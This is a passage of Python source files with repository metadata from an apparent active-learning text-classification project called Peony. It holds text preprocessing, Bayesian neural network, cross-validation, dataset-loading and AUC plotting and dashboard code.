\"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62acb88204e7c165291ac8da\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62ac981804e7c165291ac8d9\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n 
[\"62a7710ebd0a8741a56771fe\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62a7334ebd0a8741a56771fd\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a40a7560198063937b96ff\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a376fb60198063937b96fe\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62ae28e2657ef787c773fe2f\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62ad3275657ef787c773fe2e\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n]\n"
},
{
"alpha_fraction": 0.6653322577476501,
"alphanum_fraction": 0.6677342057228088,
"avg_line_length": 29.463415145874023,
"blob_id": "32128be355ffc81943f6401f4d1de8870bc73ff9",
"content_id": "8b31cb29d68ae27abfe87df50a7079b25494daf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1249,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 41,
"path": "/Peony_project/Peony_box/src/transformators/common.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport nltk\n\nfrom typing import List, Any\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import TweetTokenizer\n\n\ndef create_hash(hash_args: List[Any]) -> str:\n sha = hashlib.sha256()\n sha.update(\" \".join(hash_args).encode())\n return sha.hexdigest()\n\n\ndef stop_words_filter(tokens: List[str]) -> List[str]:\n stopset = set(stopwords.words(\"english\"))\n return [token for token in tokens if token not in stopset]\n\n\ndef lemmatizer(tokens: List[str]):\n\n lemmatizer = WordNetLemmatizer()\n lemmatized_text: List[str] = []\n\n for token in tokens:\n if lemmatizer.lemmatize(token, pos=\"n\") == token:\n if lemmatizer.lemmatize(token, pos=\"v\") == token:\n lemmatized_text.append(lemmatizer.lemmatize(token, pos=\"a\"))\n else:\n lemmatized_text.append(lemmatizer.lemmatize(token, pos=\"v\"))\n else:\n lemmatized_text.append(lemmatizer.lemmatize(token, pos=\"n\"))\n\n return lemmatized_text\n\n\ndef tokenizer(text: str) -> List[str]:\n tokenizer = TweetTokenizer()\n tokens = tokenizer.tokenize(text if isinstance(text, str) else \" \")\n return [token.lower() for token in tokens if token.isalpha() == True]\n"
},
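A minimal usage sketch of the helpers above chained into one preprocessing pass; the `nltk.download` lines fetch the standard NLTK corpora the helpers depend on (one-time setup), and the sample sentence is illustrative:

```python
# Tokenize -> drop stop words -> lemmatize, using the helpers defined above.
import nltk

nltk.download("stopwords")  # needed by stop_words_filter
nltk.download("wordnet")    # needed by lemmatizer

tokens = lemmatizer(stop_words_filter(tokenizer("The cats were running home")))
print(tokens)  # lowercased, stop-word-filtered, lemmatized tokens
```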
{
"alpha_fraction": 0.580047607421875,
"alphanum_fraction": 0.5924847722053528,
"avg_line_length": 33.99074172973633,
"blob_id": "e37a3110793f14cec72dd081584d3392931909df",
"content_id": "9bad2edbb983580e8918ea7acc144e6c39feab7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3779,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 108,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/pymc3_nn.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import theano\nimport pymc3 as pm\nimport theano.tensor as T\nimport sklearn\nimport numpy as np\n\nfrom warnings import filterwarnings\nfrom typing import Optional, Tuple, List, Callable\n\ntheano.config.gcc.cxxflags = \"-Wno-c++11-narrowing\"\nfilterwarnings(\"ignore\")\n\nEPOCHS = 60000\nfloatX = theano.config.floatX\n\n\nclass PeonyPymc3NN:\n def __init__(self, hidden_size: int, num_classes: int):\n self.n_hidden = hidden_size\n self.num_classes = num_classes\n self.num_epochs = EPOCHS\n self.initialized = False\n\n def fit(self, instances: np.ndarray, labels: np.ndarray) -> Optional[List[str]]:\n\n self.model = self._construct_nn(instances, labels)\n with self.model:\n inference = pm.ADVI()\n self.approx = pm.fit(n=EPOCHS, method=inference)\n\n self.sample_proba = self._sample_probability(instances)\n\n return None\n\n def predict(self, instances: np.ndarray) -> List[np.ndarray]:\n\n return self.sample_proba(pm.floatX(np.transpose(instances, axes=None)).T, 500)\n\n def _sample_probability(\n self, ann_input: np.ndarray\n ) -> Callable[[np.ndarray, int], theano.function]:\n # create symbolic input\n x = T.matrix(\"X\")\n # symbolic number of samples is supported, we build vectorized posterior on the fly\n n = T.iscalar(\"n\")\n # Do not forget test_values or set theano.config.compute_test_value = 'off'\n x.tag.test_value = np.empty_like(ann_input[:10])\n n.tag.test_value = 100\n _sample_proba = self.approx.sample_node(\n self.model.out.distribution.p,\n size=n,\n more_replacements={self.model[\"ann_input\"]: x},\n )\n # It is time to compile the function\n # No updates are needed for Approximation random generator\n # Efficient vectorized form of sampling is used\n return theano.function([x, n], _sample_proba)\n\n def _construct_nn(self, ann_input: np.ndarray, ann_output: np.ndarray) -> pm.Model:\n\n input_size = ann_input.shape[1]\n total_size = ann_output.shape[0]\n\n # Initialize random weights between each layer\n init_1 = np.random.randn(input_size, self.n_hidden).astype(floatX)\n init_2 = np.random.randn(self.n_hidden, self.n_hidden).astype(floatX)\n init_out = np.random.randn(self.n_hidden).astype(floatX)\n\n with pm.Model() as neural_network:\n\n ann_input = pm.Data(\"ann_input\", ann_input.astype(floatX))\n ann_output = pm.Data(\"ann_output\", ann_output.astype(floatX))\n\n # Weights from input to hidden layer\n weights_in_1 = pm.Normal(\n \"w_in_1\", 0, sigma=1, shape=(input_size, self.n_hidden), testval=init_1\n )\n\n # Weights from 1st to 2nd layer\n weights_1_2 = pm.Normal(\n \"w_1_2\",\n 0,\n sigma=1,\n shape=(self.n_hidden, self.n_hidden),\n testval=init_2,\n )\n\n # Weights from hidden layer to output\n weights_2_out = pm.Normal(\n \"w_2_out\", 0, sigma=1, shape=(self.n_hidden,), testval=init_out\n )\n\n # Build neural-network using tanh activation function\n act_1 = pm.math.tanh(pm.math.dot(ann_input, weights_in_1))\n act_2 = pm.math.tanh(pm.math.dot(act_1, weights_1_2))\n act_out = pm.math.sigmoid(pm.math.dot(act_2, weights_2_out))\n\n # Binary classification -> Bernoulli likelihood\n out = pm.Bernoulli(\n \"out\",\n act_out,\n observed=ann_output,\n total_size=total_size, # IMPORTANT for minibatches\n )\n return neural_network\n\n def reset(self) -> None:\n pass\n"
},
{
"alpha_fraction": 0.6051779985427856,
"alphanum_fraction": 0.6051779985427856,
"avg_line_length": 29.899999618530273,
"blob_id": "9d8fbdd01d91d9afd5d0012e36b007fab79f314b",
"content_id": "30bbec14c13c4ec2abe813edec0cfd0919a7cbee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 309,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 10,
"path": "/Peony_project/dump_mongo_2_json.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from bson.json_util import dumps\nfrom PeonyPackage.PeonyDb import MongoDb\n\nif __name__ == '__main__':\n api = MongoDb()\n cursor = api.get_model_results({})\n with open('collection.json', 'w') as file:\n for document in cursor:\n file.write(dumps(document))\n file.write('\\n')\n"
},
{
"alpha_fraction": 0.6509256958961487,
"alphanum_fraction": 0.6579018235206604,
"avg_line_length": 36.27000045776367,
"blob_id": "7e39295b0dd31c5b35525c47328d4e12bd7e45e4",
"content_id": "9b6648b94c6c7119c45cbbc7f54df084ae83566d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3727,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 100,
"path": "/Peony_project/Peony_box/src/utils.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\n\nfrom tqdm import tqdm\nfrom typing import Any, List, Dict, Callable, Union, Tuple\nfrom sklearn.model_selection import KFold\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import auc, roc_curve\nfrom Peony_box.src.transformators.generalized_transformator import Transformator\n\n\ndef transform_label_to_binary(\n true_vs_predicted: List[Dict[str, np.ndarray]]\n) -> Tuple[List[Dict[str, np.ndarray]], List[int]]:\n\n unique_values = np.unique(true_vs_predicted[0][\"true\"])\n if len(unique_values) > 2:\n raise Exception(\"This is not binary classification\")\n if len(unique_values) != 2:\n mapped_to_0 = unique_values[0]\n print(f\"Label {mapped_to_0} in mapped to 0, another label is mapped to 1\")\n else:\n mapped_to_0 = unique_values[0]\n mapped_to_1 = unique_values[1]\n print(f\"Label {mapped_to_0} in mapped to 0, label {mapped_to_1} in mapped to 1\")\n for record in true_vs_predicted:\n for index in range(len(record[\"true\"])):\n record[\"true\"][index] = 0 if record[\"true\"][index] == mapped_to_0 else 1\n record[\"predicted\"][index] = 0 if record[\"predicted\"][index] == mapped_to_0 else 1\n\n return (true_vs_predicted, unique_values)\n\n\ndef auc_metrics(true_vs_predicted: List[Dict[str, np.ndarray]], label_to_binary: bool = True) -> list:\n\n if label_to_binary:\n true_vs_predicted, unique_values = transform_label_to_binary(true_vs_predicted)\n\n aucs = []\n for index, record in enumerate(true_vs_predicted):\n # Compute ROC curve and area the curve\n fpr, tpr, thresholds = roc_curve(record[\"true\"], record[\"predicted\"])\n roc_auc = auc(fpr, tpr)\n aucs.append(roc_auc)\n return aucs\n\n\ndef k_fold_corss_validation(\n model: Any,\n transformator: Transformator,\n validation_instances: List[Dict[str, Any]],\n validation_labels: List[Any],\n splits: int,\n transform_label_to_binary: bool = False,\n) -> List[Dict[str, np.ndarray]]:\n\n model_output: list = []\n\n print(\"transforming instances for k fold cross validation...\")\n validation_instances = transformator.transform_instances(validation_instances)\n print(\"transforming labels for k fold cross validation...\")\n validation_labels = transformator.transform_labels(validation_labels)\n\n validation_instances, validation_labels = shuffle(validation_instances, validation_labels, random_state=0)\n\n if transform_label_to_binary:\n unique_values = np.unique(validation_labels)\n if unique_values is not None:\n validation_labels = np.asarray([0 if x == unique_values[0] else 1 for x in validation_labels])\n\n true_vs_predicted: List[Dict[str, np.ndarray]] = []\n kf = KFold(n_splits=splits)\n kf.get_n_splits(validation_instances)\n\n print(\"k fold cross validation...\")\n splitted = list(kf.split(validation_instances))\n for train_index, test_index in tqdm(splitted):\n X_train, X_test = (\n [validation_instances[i] for i in train_index],\n [validation_instances[i] for i in test_index],\n )\n y_train, y_test = (\n [validation_labels[i] for i in train_index],\n [validation_labels[i] for i in test_index],\n )\n model.training_dataset = {}\n\n output = model.fit(X_train, y_train, transformation_needed=False)\n if output:\n model_output.extend(output)\n\n y_predicted = model.predict(X_test, transformation_needed=False)\n\n true_vs_predicted.append({\"true\": y_test, \"predicted\": np.round(y_predicted)})\n model.reset()\n\n if model_output != []:\n print(\"\\n\".join(\" , \".join(output) for output in model_output))\n\n return true_vs_predicted\n"
},
{
"alpha_fraction": 0.6221547722816467,
"alphanum_fraction": 0.6236722469329834,
"avg_line_length": 31.14634132385254,
"blob_id": "95f6fd32c32afbf39d7b30ae39f757de0ce120bf",
"content_id": "a4f71c841f2a23d3b8fb61321f839dc6dc85dac2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1318,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 41,
"path": "/Peony_project/Peony_database/src/datasets/HuffPost_news_dataset.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import json\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"HuffPost_dataset\"\nCOLLECTION_ID = 1\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = 1\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash(\n [record[\"title\"], record[\"metadata\"][\"short_description\"]]\n )\n transormed_record[\"record\"][\"snippet\"] = record[\"metadata\"][\"short_description\"]\n transormed_record[\"record\"][\"text\"] = {\n \"title\": record[\"title\"],\n \"body\": record[\"body\"],\n }\n transormed_record[\"record\"][\"label\"] = record[\"metadata\"][\"category\"]\n transormed_record[\"record\"][\"metadata\"] = {\n \"authors\": record[\"metadata\"][\"authors\"],\n \"language\": record[\"language\"],\n }\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n data: list = []\n for json_doc in tqdm(path.iterdir()):\n if json_doc.stem != \".DS_Store\":\n with open(json_doc, \"r\") as f:\n lines = f.readlines()\n data.extend(*[json.loads(line) for line in lines])\n return data\n"
},
{
"alpha_fraction": 0.5008240938186646,
"alphanum_fraction": 0.5313162207603455,
"avg_line_length": 28.908451080322266,
"blob_id": "87f7426705c83cf72df4ae061abac255db924d9b",
"content_id": "d498c4d6cf4824186421b223816d33328ea761a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8494,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 284,
"path": "/Peony_project/Peony_visualization/src/active_learning_for_text_classification/plots_for_article.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\n\nfrom PeonyPackage.PeonyDb import MongoDb\n\n\ndef visualize_auc_evolutions(\n ax,\n markevery,\n auc_seq_passive_1,\n auc_seq_passive_2,\n auc_seq_active_1,\n auc_seq_active_2,\n model_1,\n model_2,\n title,\n):\n\n auc_1_passive_mean = np.mean(auc_seq_passive_1, axis=0)\n auc_1_passive_std = np.std(auc_seq_passive_1, axis=0)\n\n auc_2_passive_mean = np.mean(auc_seq_passive_2, axis=0)\n auc_2_passive_std = np.std(auc_seq_passive_2, axis=0)\n\n auc_1_active_mean = np.mean(auc_seq_active_1, axis=0)\n auc_1_active_std = np.std(auc_seq_active_1, axis=0)\n\n auc_2_active_mean = np.mean(auc_seq_active_2, axis=0)\n auc_2_active_std = np.std(auc_seq_active_2, axis=0)\n\n ax.grid(alpha=0.2)\n ax.plot(\n [i for i in range(200)],\n auc_1_passive_mean,\n linestyle=\"--\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=f\"Random Selection {model_1} mean\",\n alpha=0.4,\n )\n ax.plot(auc_1_passive_mean + auc_1_passive_std, linestyle=\"-\", color=\"b\", alpha=0.1)\n ax.plot(auc_1_passive_mean - auc_1_passive_std, linestyle=\"-\", color=\"b\", alpha=0.1)\n\n ax.plot(\n [i for i in range(200)],\n auc_2_passive_mean,\n linestyle=\"--\",\n marker=\"*\",\n markevery=markevery,\n color=\"g\",\n lw=1,\n label=f\"Random Selection {model_2} mean\",\n alpha=0.4,\n )\n ax.plot(auc_2_passive_mean + auc_2_passive_std, linestyle=\"-\", color=\"g\", alpha=0.1)\n ax.plot(auc_2_passive_mean - auc_2_passive_std, linestyle=\"-\", color=\"g\", alpha=0.1)\n\n ax.plot(\n [i for i in range(200)],\n auc_1_active_mean,\n linestyle=\"-\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=f\"Active Learning {model_1} mean\",\n )\n ax.plot(auc_1_active_mean + auc_1_active_std, linestyle=\"-\", color=\"b\", alpha=0.1)\n ax.plot(auc_1_active_mean - auc_1_active_std, linestyle=\"-\", color=\"b\", alpha=0.1)\n\n ax.plot(\n [i for i in range(200)],\n auc_2_active_mean,\n linestyle=\"-\",\n marker=\"*\",\n markevery=markevery,\n color=\"g\",\n lw=1,\n label=f\"Active Learning {model_2} mean\",\n )\n ax.plot(auc_2_active_mean + auc_2_active_std, linestyle=\"-\", color=\"g\", alpha=0.1)\n ax.plot(auc_2_active_mean - auc_2_active_std, linestyle=\"-\", color=\"g\", alpha=0.1)\n\n ax.fill_between(\n [i for i in range(200)],\n (auc_1_passive_mean + auc_1_passive_std).reshape(\n len(auc_2_active_mean),\n ),\n (auc_1_passive_mean - auc_1_passive_std).reshape(\n len(auc_2_active_mean),\n ),\n alpha=0.05,\n color=\"b\",\n )\n\n ax.fill_between(\n [i for i in range(200)],\n (auc_2_passive_mean + auc_2_passive_std).reshape(\n len(auc_2_active_mean),\n ),\n (auc_2_passive_mean - auc_2_passive_std).reshape(\n len(auc_2_active_mean),\n ),\n alpha=0.05,\n color=\"g\",\n )\n\n ax.fill_between(\n [i for i in range(200)],\n (auc_1_active_mean + auc_1_active_std).reshape(\n len(auc_2_active_mean),\n ),\n (auc_1_active_mean - auc_1_active_std).reshape(\n len(auc_2_active_mean),\n ),\n alpha=0.05,\n color=\"b\",\n )\n\n ax.fill_between(\n [i for i in range(200)],\n (auc_2_active_mean + auc_2_active_std).reshape(\n len(auc_2_active_mean),\n ),\n (auc_2_active_mean - auc_2_active_std).reshape(\n len(auc_2_active_mean),\n ),\n alpha=0.05,\n color=\"g\",\n )\n\n ax.set_xlabel(\"Requests\", fontsize=17)\n ax.set_ylabel(\"AUC\", fontsize=17)\n ax.set_title(\n f\"{title} categories\",\n fontsize=17,\n )\n ax.legend(loc=\"lower right\", fontsize=16)\n\n return ax\n\n\ndef main():\n api = MongoDb()\n\n # alg_1 = 
\"bayesian_dropout_nn_fast_text_embeddings\"\n # alg_2 = \"bayesian_denfi_v_2_0.3_fast_text_embeddings\"\n\n # alg_legend_1 = \"Dropout\"\n # alg_legend_2 = \"DEnFi\"\n\n # categories = [\n # \"CRIME\",\n # \"POLITICS\",\n # \"COLLEGE\",\n # \"SPORTS\",\n # \"TECH\",\n # \"POSITIVE EMOTIONS TWEETS\",\n # ]\n # title_categories = [\n # \"Crime vs Good News\",\n # \"Politics vs Business\",\n # \"College vs Education\",\n # \"Sports vs Comedy\",\n # \"Tech vs Science\",\n # \"Positive Tweets vs Negative Tweets\",\n # ]\n\n # # font = {\"size\": 14}\n\n # # matplotlib.rc(\"font\", **font)\n\n # for index, (category, title_category) in enumerate(zip(categories, title_categories)):\n # # Random acquisition function\n # random_sampling_results_1 = api.get_model_results(\n # {\"model\": alg_1, \"acquisition_function\": \"random\", \"category_1\": category}\n # )[0]\n # random_sampling_results_2 = api.get_model_results(\n # {\"model\": alg_2, \"acquisition_function\": \"random\", \"category_1\": category}\n # )[0]\n\n # # Entropy acquisition function\n # entropy_sampling_results_1 = api.get_model_results(\n # {\"model\": alg_1, \"acquisition_function\": \"entropy\", \"category_1\": category}\n # )[0]\n # entropy_sampling_results_2 = api.get_model_results(\n # {\"model\": alg_2, \"acquisition_function\": \"entropy\", \"category_1\": category}\n # )[0]\n\n # ax = plt.subplot(2, 3, index + 1)\n # visualize_auc_evolutions(\n # ax,\n # 14,\n # random_sampling_results_1[\"results\"],\n # random_sampling_results_2[\"results\"],\n # entropy_sampling_results_1[\"results\"],\n # entropy_sampling_results_2[\"results\"],\n # alg_legend_1,\n # alg_legend_2,\n # title_category,\n # )\n\n alg_1 = \"bayesian_dropout_nn_fast_text_0.3\"\n alg_2 = \"bayesian_denfi_nn_fast_text_0.3\"\n alg_3 = \"bayesian_dropout_nn_roberta_0.1\"\n alg_4 = \"bayesian_denfi_nn_roberta_0.1\"\n alg_5 = \"bayesian_dropout_nn_laser_0.1\"\n alg_6 = \"bayesian_denfi_nn_laser_0.1\"\n\n alg_legend_1 = \"Dropout\"\n alg_legend_2 = \"DEnFi\"\n\n categories = [\n \"fake_news\",\n \"fake_news\",\n \"fake_news\",\n \"fake_news_detection\",\n \"fake_news_detection\",\n \"fake_news_detection\",\n ]\n title_categories = [\n \"Fast Text Fake vs True\",\n \"Laser Fake vs True\",\n \"Roberta Fake vs True\",\n \"Fast Text Fake vs True Detection\",\n \"Laser Fake vs True Detection\",\n \"Roberta Fake vs True Detection\",\n ]\n\n for index, (category, title_category) in enumerate(zip(categories, title_categories)):\n # Random acquisition function\n random_sampling_results_1 = api.get_model_results(\n {\n \"model\": alg_1 if index in {0, 3} else alg_5 if index in {1, 4} else alg_3,\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0]\n random_sampling_results_2 = api.get_model_results(\n {\n \"model\": alg_2 if index in {0, 3} else alg_6 if index in {1, 4} else alg_4,\n \"acquisition_function\": \"random\",\n \"category_1\": category,\n }\n )[0]\n\n # Entropy acquisition function\n entropy_sampling_results_1 = api.get_model_results(\n {\n \"model\": alg_1 if index in {0, 3} else alg_5 if index in {1, 4} else alg_3,\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0]\n entropy_sampling_results_2 = api.get_model_results(\n {\n \"model\": alg_2 if index in {0, 3} else alg_6 if index in {1, 4} else alg_4,\n \"acquisition_function\": \"entropy\",\n \"category_1\": category,\n }\n )[0]\n\n ax = plt.subplot(2, 3, index + 1)\n visualize_auc_evolutions(\n ax,\n 14,\n random_sampling_results_1[\"results\"],\n 
random_sampling_results_2[\"results\"],\n entropy_sampling_results_1[\"results\"],\n entropy_sampling_results_2[\"results\"],\n alg_legend_1,\n alg_legend_2,\n title_category,\n )\n\n plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.2, hspace=0.3)\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
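
The `visualize_auc_evolutions` function above repeats one plotting idiom four times: draw the mean AUC across runs and shade a one-standard-deviation band around it. Reduced to a single curve with synthetic data, the idiom is:

```python
import matplotlib.pyplot as plt
import numpy as np

# 5 simulated runs of 200 active-learning requests each (synthetic data)
runs = np.random.default_rng(0).uniform(0.6, 0.9, size=(5, 200))
mean, std = runs.mean(axis=0), runs.std(axis=0)
x = np.arange(200)

plt.plot(x, mean, color="b", lw=1, label="Active Learning mean")
plt.fill_between(x, mean + std, mean - std, color="b", alpha=0.1)
plt.xlabel("Requests")
plt.ylabel("AUC")
plt.legend(loc="lower right")
plt.show()
```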
{
"alpha_fraction": 0.5917387008666992,
"alphanum_fraction": 0.5936599373817444,
"avg_line_length": 26.394737243652344,
"blob_id": "8f8a8fd369fbf69e3915e24ecd0b974db5ded5e3",
"content_id": "6f231176374eba30151ca9f8e3e101b57b6ac15a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1041,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 38,
"path": "/Peony_project/Peony_database/src/datasets/emotion_tweets.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"emotion_tweets\"\nCOLLECTION_ID = 13\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = COLLECTION_ID\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash([record[\"body\"]])\n transormed_record[\"record\"][\"text\"] = {\n \"title\": record[\"title\"],\n \"body\": record[\"body\"],\n }\n transormed_record[\"record\"][\"label\"] = record[\"label\"]\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n data: list = []\n\n df = pd.read_csv(path)\n for _, row in df.iterrows():\n data.append(\n {\n \"title\": \"\",\n \"body\": row[\"content\"],\n \"label\": row[\"sentiment\"],\n }\n )\n return data\n"
},
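
`load_data` above iterates with `iterrows`, which constructs a pandas Series per row; for larger CSVs an equivalent pass with `itertuples` avoids that overhead (same output, assuming the same `content`/`sentiment` column names):

```python
import pandas as pd
from pathlib import Path

def load_data_fast(path: Path) -> list:
    df = pd.read_csv(path)
    # itertuples yields lightweight namedtuples instead of Series objects
    return [
        {"title": "", "body": row.content, "label": row.sentiment}
        for row in df.itertuples(index=False)
    ]
```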
{
"alpha_fraction": 0.3844710886478424,
"alphanum_fraction": 0.4044123589992523,
"avg_line_length": 33.6845817565918,
"blob_id": "10243d53e3a0f09ed273aa883508ec80b2443f62",
"content_id": "07114a593bcd2887c3ddcb0bf4e52afd2f080089",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24522,
"license_type": "no_license",
"max_line_length": 273,
"num_lines": 707,
"path": "/Peony_project/Peony_visualization/src/Dashboard/app.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import dash\nimport os\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport plotly.graph_objects as go\nimport datetime\nimport re\n\nfrom dash.dependencies import Input, Output, State\nfrom plotly.colors import n_colors\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom Peony_database.src.database_results.results_summary import PeonyDbResults\n\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\napi = MongoDb()\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\ndatabase_results = PeonyDbResults()\n\ntabs_styles = {\"height\": \"44px\"}\n\ntab_style = {\n \"borderBottom\": \"1px solid #d6d6d6\",\n \"padding\": \"6px\",\n}\n\ntab_selected_style = {\n \"borderTop\": \"1px solid #d6d6d6\",\n \"borderBottom\": \"1px solid #d6d6d6\",\n \"backgroundColor\": \"#1f2e2e\",\n \"color\": \"white\",\n \"padding\": \"6px\",\n}\n\n\ndef hamming_distance(chaine1, chaine2):\n return sum(c1 != c2 for c1, c2 in zip(chaine1, chaine2))\n\n\ndef find_similar_algorithms_in_db(alg):\n db_algs = database_results.structurize_data()\n similar_algs = []\n for db_alg in db_algs:\n str_non_similarity = hamming_distance(alg, db_alg)\n if str_non_similarity <= 2:\n similar_algs.append(db_alg)\n return sorted(similar_algs)\n\n\ndef create_evolution_table_stats(res, mean_func, dev_func, slider_val):\n slider_val = slider_val - 1\n return [round(mean_func(res, axis=0)[0][0], 3)] + [\n round(mean_func(res, axis=0)[int((i * 200 / (slider_val) - 1))][0], 3)\n for i in range(1, slider_val + 1)\n ]\n\n\ndef get_res_from_db(alg, acsq_func, category_1, category_2):\n res = api.get_model_results(\n {\n \"model\": alg,\n \"acquisition_function\": acsq_func,\n \"category_1\": category_1,\n \"category_2\": category_2,\n }\n )\n return res[0][\"results\"] if res else None\n\n\ndef create_evloution_table(category, algs, slider_val):\n\n dev_func = np.std\n mean_func = np.mean\n\n alg_legend = \" \".join([token.capitalize() for token in algs[0].split(\"_\")[:2]])\n category_1, category_2 = [\n val.strip().upper() for val in re.sub(\"_\", \" \", category).split(\"vs\")\n ]\n\n title_category = \" \".join([category_1.capitalize(), \"Vs.\", category_2.capitalize()])\n\n if len(algs) == 1:\n return html.H4(\n f\"No additional noise visualization data in Db found for {title_category} and {alg_legend}\"\n )\n\n list_w_results = []\n\n for alg in algs:\n res = get_res_from_db(alg, \"entropy\", category_1, category_2)\n if res is None:\n return html.H4(\n f\"No additional noise visualization data in Db found for {title_category} and {alg_legend}\"\n )\n list_w_results.append(\n create_evolution_table_stats(res, mean_func, dev_func, slider_val)\n )\n\n list_w_results = list(map(list, zip(*list_w_results)))\n noise_var = [0.1, 0.2, 0.3, 0.4, 0.6]\n colors = n_colors(\"rgb(172, 193, 198)\", \"rgb(2, 52, 81)\", 5, colortype=\"rgb\")\n table_to_vis = [noise_var] + [val for val in list_w_results]\n slider_val -= 1\n fig = go.Figure(\n data=[\n go.Table(\n header=dict(\n values=[\"<b>Noise Variance</b>\", \"<b>0</b>\"]\n + [\n f\"<b>{int(i * 200 / (slider_val))}</b>\"\n for i in range(1, slider_val + 1)\n ],\n font_size=13,\n align=\"center\",\n height=40,\n ),\n cells=dict(\n values=table_to_vis,\n fill_color=[\n np.array(colors)[np.argsort(np.argsort(val))]\n for val in table_to_vis\n ],\n align=\"center\",\n font_size=13,\n height=40,\n ),\n )\n ]\n )\n\n 
fig.update_layout(\n height=500,\n width=1000,\n title_text=f\"{alg_legend} Algorithm with Respect to Different Additive Noise\",\n )\n fig.layout.template = \"plotly_dark\"\n return dcc.Graph(figure=fig)\n\n\ndef visualize_auc_evolutions(\n auc_seq_passive_1,\n auc_seq_passive_2,\n auc_seq_active_1,\n auc_seq_active_2,\n model_1,\n model_2,\n title,\n):\n\n auc_1_passive_mean = np.mean(auc_seq_passive_1, axis=0).reshape(-1)\n auc_1_passive_std = np.std(auc_seq_passive_1, axis=0).reshape(-1)\n\n auc_2_passive_mean = np.mean(auc_seq_passive_2, axis=0).reshape(-1)\n auc_2_passive_std = np.std(auc_seq_passive_2, axis=0).reshape(-1)\n\n auc_1_active_mean = np.mean(auc_seq_active_1, axis=0).reshape(-1)\n auc_1_active_std = np.std(auc_seq_active_1, axis=0).reshape(-1)\n\n auc_2_active_mean = np.mean(auc_seq_active_2, axis=0).reshape(-1)\n auc_2_active_std = np.std(auc_seq_active_2, axis=0).reshape(-1)\n\n fig = go.Figure()\n fig.layout.template = \"plotly_dark\"\n\n # Passive learning\n\n y_upper = auc_1_passive_mean + auc_1_passive_std\n y_lower = auc_1_passive_mean - auc_1_passive_std\n fig.add_trace(\n go.Scatter(\n x=list(range(200)) + list(range(200))[::-1],\n y=np.concatenate(\n [y_upper, y_lower[::-1]],\n ),\n line=dict(color=\"rgb(171, 235, 